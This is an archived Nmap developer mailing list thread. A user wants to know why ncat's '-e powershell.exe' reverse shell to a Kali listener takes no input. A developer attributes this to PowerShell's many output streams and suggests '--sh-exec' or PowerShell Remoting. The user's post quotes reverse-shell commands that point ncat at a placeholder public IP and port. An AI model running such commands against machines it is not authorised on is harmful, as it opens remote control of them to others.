Nmap Development mailing list archives

Re: Netcat powershell bug?


From: Daniel Miller <bonsaiviking () gmail com>
Date: Mon, 23 Jan 2017 07:53:17 -0600

Efrat,

I'm afraid I don't have a solution, but I can guess at the source of the
problem: Ncat does execution by redirecting the three primary I/O streams
to the TCP connection: stdin, stdout, and stderr. Powershell, on the other
hand, has many more output streams. It has streams for progress indication,
logging, error, output, and more. Ncat probably is just not handling this
properly. Also, if it's anything like some Linux commands (like vi, screen,
or anything using ncurses), it can probably read directly from something
like a pseudo terminal device, which is not the stdin stream.

I have not tried this, but you could try executing powershell.exe within
cmd.exe and see if that solves the streams problem: use --sh-exec instead
of -e to do this.

Of course, the canonical answer is to use a feature of Powershell like
Powershell Remoting or even use Powershell code itself to do the TCP
connection instead of using Ncat or another 3rd-party binary.

Dan

On Sun, Jan 22, 2017 at 7:45 AM, Efrat Rozen <efratrozen1983 () gmail com>
wrote:

Hi, I'm having trouble opening a reverse PowerShell shell using ncat.

I'm using the executable version of ncat on a Windows client and running the
listener on Kali using the nc -l command.

When I launch this command on my Windows target:
ncat.exe [public ip] [port] -e cmd.exe

it opens a cmd reverse shell perfectly on the Kali listener,
but when I use:

ncat.exe [public ip] [port] -e powershell.exe

it just opens the PowerShell 'welcome' on the Kali listener without any option
to type in commands.
Can you please offer some suggestions? I'll be happy to donate as well :)

Thanks.


_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/